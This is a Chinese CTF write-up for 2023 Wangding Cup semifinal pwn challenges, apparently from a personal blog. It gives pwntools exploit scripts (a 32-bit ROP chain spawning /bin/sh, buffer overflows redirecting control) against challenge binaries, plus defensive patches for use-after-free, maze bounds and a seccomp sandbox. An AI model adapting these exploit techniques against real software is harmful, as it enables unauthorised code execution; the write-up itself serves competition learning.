---
title: 2023 网鼎杯半决赛 pwn Writeup
date: 2023-04-23 21:04:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=61/
pin: false
published:
---

对不起😭

气死我了，越想越气

## pwn03

题目ban掉了`BINSHbinsh`字符串，先在bss里读入'/bin/sh\x00'，引用即可

```python
# _*_ coding:utf-8 _*_
from pwn import *
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256
from struct import pack

context.log_level = "debug"
context.arch = "i386"

# p = remote("172.16.7.10","8960")
# p = process('./ld-2.33.so ./TinyNote'.split(),env={'LD_PRELOAD':'./libc-2.33.so'})
p = process("./bin")
elf = ELF("./bin")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------


main = 0x80488CE
pop_eax = 0x080b8f16            
int80 = 0x0806d4a3            
pop_ebx = 0x080481c9            
pop_ecx = 0x080df91d            
pop_edx = 0x0806f89b            
read = 0x0806DE00                      
bss = 0x080EBF80 


sla("please input what you want say",'a'*0x74+p32(read)+p32(main)+p32(0)+p32(bss)+p32(8))                    
s("/bin/sh\x00")            
pay = 'a'*0x74+p32(pop_eax)+ p32(0xb)+p32(pop_ebx)+p32(bss)+p32(pop_ecx)+p32(0)+p32(pop_edx)+p32(0)+p32(int80)          
s(pay) 

ia()
```

## pwn05

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("172.16.7.10","13944")
p = process("./bin")
elf = ELF("./bin")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
# context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------


payload='1'*0x10+'85140' 
sl(payload)
ia()
```



## pwn09

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("172.16.7.10","19414")

# context.terminal = ['tmux', 'splitw', '-hp','64']
p = process("./bin")
elf = ELF("./bin")
libc = elf.libc
context.arch = elf.arch
context.log_level = "debug" # info

def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

shell = 0x80488CE

sa("please input your username",'admin')
sa("please input your passwd",('a'*0x1d+p32(shell)).ljust(0x107,'a'))

ia()
```



## RDP

### babyshell

patch UAF，将ptr置0

在.eh_frame新增置零函数

```asm
# patch asm
call _free
lea rax, qword ptr [202050h]
mov qword ptr [rax], 0
jmp 0xC0A
```

sub_1000

```asm
.eh_frame:0000000000001000                               ; void __fastcall __noreturn sub_1000(void *)
.eh_frame:0000000000001000                               sub_1000 proc near                      ; CODE XREF: sub_BF7+E↑j
.eh_frame:0000000000001000 E8 BB F8 FF FF                call    _free
.eh_frame:0000000000001000
.eh_frame:0000000000001005 48 8D 05 44 10 20 00          lea     rax, ptr
.eh_frame:000000000000100C 90                            nop
.eh_frame:000000000000100D 48 C7 C0 00 00 00 00          mov     rax, 0
.eh_frame:0000000000001014 E9 F1 FB FF FF                jmp     loc_C0A
```

rm函数设置跳转`jmp 0x1000`

```asm
.text:0000000000000BF7                               ; void __noreturn sub_BF7()
.text:0000000000000BF7                               sub_BF7 proc near                       ; CODE XREF: main+CE↓p
.text:0000000000000BF7                               ; __unwind {
.text:0000000000000BF7 55                            push    rbp
.text:0000000000000BF8 48 89 E5                      mov     rbp, rsp
.text:0000000000000BFB 48 8B 05 4E 14 20 00          mov     rax, cs:ptr
.text:0000000000000C02 48 89 C7                      mov     rdi, rax                        ; ptr
.text:0000000000000C05 E9 F6 03 00 00                jmp     sub_1000
```



touch处修改读入的size，照着上边size引用抄就行

```asm
.text:0000000000000B91 8B 45 F4                      mov     eax, dword ptr [rbp+size]
.text:0000000000000B94 89 C0                         mov     eax, eax
.text:0000000000000B96 48 89 C7                      mov     rdi, rax                        ; size
.text:0000000000000B99 E8 B2 FD FF FF                call    _malloc
.text:0000000000000B99
.text:0000000000000B9E 48 89 05 AB 14 20 00          mov     cs:ptr, rax
.text:0000000000000BA5 48 8D 3D 96 02 00 00          lea     rdi, aData                      ; "data: "
.text:0000000000000BAC B8 00 00 00 00                mov     eax, 0
.text:0000000000000BB1 E8 4A FD FF FF                call    _printf
.text:0000000000000BB1
.text:0000000000000BB6 48 8B 05 93 14 20 00          mov     rax, cs:ptr
.text:0000000000000BBD 8B 75 F4                      mov     esi, dword ptr [rbp+size]
.text:0000000000000BC0 90                            nop
.text:0000000000000BC1 90                            nop
.text:0000000000000BC2 48 89 C7                      mov     rdi, rax
.text:0000000000000BC5 E8 E0 FE FF FF                call    sub_AAA
```

```c
unsigned __int64 sub_B51()
{
  _DWORD size[3]; // [rsp+4h] [rbp-Ch] BYREF

  *&size[1] = __readfsqword(0x28u);
  printf("size: ");
  __isoc99_scanf("%u", size);
  ptr = malloc(size[0]);
  printf("data: ");
  sub_AAA(ptr, size[0]);
  return __readfsqword(0x28u) ^ *&size[1];
}
```



后来看到一种更为美观的patch方法，😭汇编太菜了

```asm
call    _free
mov     qword ptr [202050h], 0
jmp     loc_C0A
```



执行rm函数直接执行到0xf50

```asm
.eh_frame:0000000000000F50                               _eh_frame segment qword public 'CONST' use64
.eh_frame:0000000000000F50                               assume cs:_eh_frame
.eh_frame:0000000000000F50                               ;org 0F50h
.eh_frame:0000000000000F50                               ; START OF FUNCTION CHUNK FOR sub_BF7
.eh_frame:0000000000000F50
.eh_frame:0000000000000F50                               loc_F50:                                ; CODE XREF: sub_BF7+E↑j
.eh_frame:0000000000000F50 E8 6B F9 FF FF                call    _free
.eh_frame:0000000000000F50
.eh_frame:0000000000000F55 48 C7 05 F0 10 20 00 00 00 00+mov     cs:ptr, 0
.eh_frame:0000000000000F55 00
.eh_frame:0000000000000F60 E9 A5 FC FF FF                jmp     loc_C0A
```

### maze

迷宫题，防止越界，添加判断校验即可

```
.eh_frame:00000000004012C8 83 BD E8 FB FF FF 63          cmp     dword ptr [rbp-418h], 63h ; 'c'
.eh_frame:00000000004012CF 0F 87 25 F9 FF FF             ja      loc_400BFA
.eh_frame:00000000004012CF
.eh_frame:00000000004012D5 83 BD EC FB FF FF 15          cmp     dword ptr [rbp-414h], 15h
.eh_frame:00000000004012DC 0F 87 18 F9 FF FF             ja      loc_400BFA
.eh_frame:00000000004012DC
.eh_frame:00000000004012E2 48 8D 3D 2F FA FF FF          lea     rdi, aPleaseInputWas            ; "PLEASE INPUT wasd TO MOVE YOURSELF!"
.eh_frame:00000000004012E9 E9 0C F6 FF FF                jmp     loc_4008FA
```



### server

题目自带沙箱

```c
__int64 sub_3E63()
{
  __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = seccomp_init(2147418112LL);
  if ( !v1 )
    exit(0);
  seccomp_rule_add_exact(v1, 0LL, 59LL, 0LL);
  if ( (int)seccomp_load(v1) < 0 )
    exit(0);
  return seccomp_release(v1);
}
```

先nop掉沙箱，再套上一个新沙箱即可😭

